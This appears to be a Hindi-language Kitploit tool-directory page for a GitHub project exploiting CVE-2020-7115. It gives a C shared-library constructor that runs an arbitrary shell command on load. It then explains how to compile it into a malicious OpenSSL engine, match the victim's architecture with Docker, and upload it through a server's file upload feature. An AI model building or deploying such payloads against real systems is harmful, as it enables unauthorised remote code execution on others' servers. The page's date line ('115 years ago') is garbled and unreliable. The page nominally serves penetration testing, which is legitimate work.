Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/retr02332/cve-2020-7115
पेलोड जनरेशनभेद्यता विश्लेषणशोषणशेलकोडवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंग
GitHubretr02332/cve-2020-7115

CVE-2020-7115

कुछ ही सेकंडों में अपना मैलिशस इंजन बनाएं

रिपॉजिटरी देखें
115 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2020-7115

सेकंडों में अपना दुर्भावनापूर्ण इंजन बनाएँ

build_engine.sh

एक सरल स्क्रिप्ट जो एक दुर्भावनापूर्ण इंजन उत्पन्न करती है, जो openssl आर्गुमेंट इंजेक्शन परिदृश्यों में उपयोग के लिए तैयार है।

इसका उपयोग कैसे करें?

यह बहुत सरल है, बस engine.c फ़ाइल को अपनी पसंद के कमांड के साथ संशोधित करें:

root@kitploit:~
#include <unistd.h>

__attribute__((constructor))
static void init() {
    execl("/bin/sh", "sh", "-c", "COMMAND");
}

एक बार जब आप ऐसा कर लें, तो अब आपको बस स्क्रिप्ट को इस प्रकार चलाना है:

root@kitploit:~
bash build_engine.sh

यह कमांड output नामक एक फ़ोल्डर बनाएगा, जिसमें आपको engine.so नामक एक फ़ाइल मिलेगी, जिसे आपको फ़ाइल अपलोड कार्यक्षमता के माध्यम से सर्वर पर भेजना होगा।

स्क्रिप्ट चलाने के लिए डॉकर कैसे उठाएँ और मुझे ऐसा क्यों करना चाहिए?

आपके लिए यह जानना महत्वपूर्ण है कि आपको पीड़ित प्रणाली की समान विशेषताओं के साथ दुर्भावनापूर्ण इंजन बनाना होगा। यानी... यदि लक्ष्य प्रणाली 64-बिट लिनक्स पर चल रही है, तो आपको 64-बिट लिनक्स पर दुर्भावनापूर्ण इंजन बनाना होगा।

डॉकर इस प्रकार की चीज़ों के लिए एक अद्भुत तकनीक है, और अपना परिवेश स्थापित करना बहुत आसान है।

पहले हम इस साइट से 64-बिट डेबियन लिनक्स सिस्टम के लिए डॉकर इमेज डाउनलोड करें:

root@kitploit:~
sudo docker pull debian

फिर हम डॉकर को इस प्रकार उठाएँगे:

root@kitploit:~
sudo docker run -v `pwd`:/code -it debian

आइए थोड़ा समझें कि हमने यहाँ क्या किया। -v फ़्लैग का उपयोग वॉल्यूम बनाने के लिए किया जाता है, इस मामले में हम /code फ़ोल्डर की सामग्री को अपने वर्तमान निर्देशिका फ़ोल्डर की सामग्री से जोड़ रहे हैं, इसलिए pwd का उपयोग।

जोड़ने का अर्थ है कि हम /code (फ़ोल्डर जो डॉकर इमेज के रूट में होस्ट किया गया है) में जो कुछ भी बनाते या संपादित करते हैं, वह हमारे पास होगा और हम उसे pwd में देखेंगे, और विपरीत दिशा में भी।

हमारे मामले में, pwd हमारी स्थानीय मशीन पर निम्नलिखित निर्देशिका की ओर इशारा करता है:

/home/retr0/CVE-2020-7115/

दूसरी ओर, -it फ़्लैग को इस प्रकार देखा जा सकता है:

-t (--tty) फ़्लैग डॉकर को कंटेनर के अंदर एक वर्चुअल टर्मिनल सत्र मैप करने का निर्देश देता है। इसका उपयोग आमतौर पर -i (--interactive) विकल्प के साथ किया जाता है, जो STDIN को खुला रखता है, भले ही detached mode में चल रहा हो।

इसलिए प्रभावी रूप से -it फ़्लैग का उपयोग तब उपयोगी होता है जब हम संबंधित कंटेनर से एक शेल प्राप्त करना चाहते हैं।

CVE-2020-7115 नहीं जानते?

कोई बात नहीं, बस इस पोस्ट पर जाएँ, और मुझे यकीन है कि आप इस भेद्यता को पूरी तरह से समझ जाएँगे।

टूल डाउनलोड करें